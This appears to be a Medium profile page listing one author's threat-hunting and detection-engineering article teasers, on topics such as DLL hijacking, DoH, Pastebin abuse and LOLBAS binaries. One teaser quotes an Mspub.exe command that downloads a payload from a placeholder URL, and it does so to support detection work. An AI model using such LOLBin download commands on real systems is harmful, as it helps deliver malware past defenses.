
mthcht

255 Followers


Published in Detect FYI · Pinned

Detect DLL Hijacking techniques from HijackLibs with Splunk

What is DLL Hijacking? DLL Hijacking manipulates a trusted application into executing an unauthorized DLL. Antivirus and EDR solutions may not automatically detect this deceptive activity. Additionally, application whitelisting solutions like AppLocker might not prevent the rogue code from running. Numerous threat actors have been documented using this technique to meet their goals. HijackLibs

Dll Hijacking

6 min read


Published in Detect FYI · Nov 7

Detecting DNS over HTTPS

What is DNS over HTTPS (DoH)? DoH secures DNS queries by encapsulating them within HTTPS traffic, leveraging encryption to mitigate interception and MITM attacks. Initiated by Google and Mozilla, and notably adopted by Firefox at first, DoH has shifted the DNS landscape towards greater privacy. Defined in RFC 8484, DoH uses HTTP/2 or HTTP/3 for transport…

DNS

8 min read


Published in Detect FYI · Nov 3

Threat Hunting - Suspicious TLDs

Understanding the Threat Landscape. Top-level domains (TLDs) hold significant influence in the domain name system (DNS) hierarchy and can serve as indicators for threat detection.

Proxy

6 min read


Published in OSINT TEAM · Oct 4

Catching My Hacker via Leaked Databases

This blog post was made in 2016, which I was able to recover through some data carving on old backups. I got Hacked in 2009: I was living in France and, before the French company ‘Free Mobile’ disrupted the mobile market, we all had to deal with useless and expensive mobile plans. I…

Osint Investigation

8 min read


Sep 30

The Myths and Realities of VPNs

Have you also noticed the aggressive advertising campaigns for VPN providers, promoted by social media influencers and YouTube creators? As a security analyst, it’s incredibly annoying to hear them spread the lies they’re paid to tell their audience, especially when some of them are already aware that they’re spreading lies. This…

Vpn Service Providers

4 min read


Published in Detect FYI · Aug 24

How Threat Actors use Pastebin

Why is it important to monitor paste sites? Pastebin is a widely used text-sharing platform and a double-edged sword: while it serves legitimate purposes, mostly for developers and tech enthusiasts, it has been abused by threat actors for years to look for leaked information, host malware, exfiltrate data and even as a C2. …

Paste Bin

3 min read


Aug 23

LOLBAS Detection Serie [2] — Mspub.exe + ProtocolHandler.exe + MsoHtmEd.exe

The LOLBAS series: https://medium.com/@mthcht/list/lolbas-843ba9de6810 This time, I’ve selected three LOLbins associated with Microsoft Office. Let’s test and examine each one to determine what we can detect! MSPUB.exe: LOL technique for MSPUB.exe. Ref LOLBAS: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/ C_h4ck_0 on Twitter found a way to download arbitrary files with MSPUB.exe by using the following command: mspub.exe https://example.com/payload

Lolbas

5 min read


Published in Detect FYI · Aug 21

LOLBAS Detection Serie [1] - AppInstaller.exe

The LOLBAS series: https://mthcht.medium.com/list/lolbas-843ba9de6810 What is AppInstaller? AppInstaller is a utility that allows the installation of APPX and MSIX packages, leveraged by numerous software editors and playing a key role in software management. What is LOLBAS? Living Off The Land Binaries and Scripts. The goal of the LOLBAS project is to document every binary, script, and…

Threat Hunting

6 min read


Published in Detect FYI · Aug 15

Detecting Phishing attempts with DNSTWIST

DNSTWIST for SOC & CTI. Dnstwist is a tool designed to identify domains that might be used in phishing attacks or other malicious activities by generating a comprehensive list of variations on a given domain using the following techniques: Addition: adds characters to the domain name. Bitsquatting: uses bit errors to generate similar-looking domain names. …

Threat Hunting

12 min read


Published in Detect FYI · Aug 11

File Integrity Monitoring with Auditd

FIM? PCI DSS? File Integrity Monitoring (FIM) is a security process that involves the regular monitoring and detection of changes in files, including system files, configurations, and content files. It is crucial in ensuring that files have not been tampered with, corrupted, or otherwise altered in an unauthorized manner. Payment Card Industry Data…

Threat Hunting

19 min read


Threat Hunting - DFIR - Detection Engineering https://twitter.com/mthcht

Following
  • Simone Kraus
  • Anton Chuvakin
  • Root ♊
  • Michael Koczwara
  • Nasreddine Bencherchali
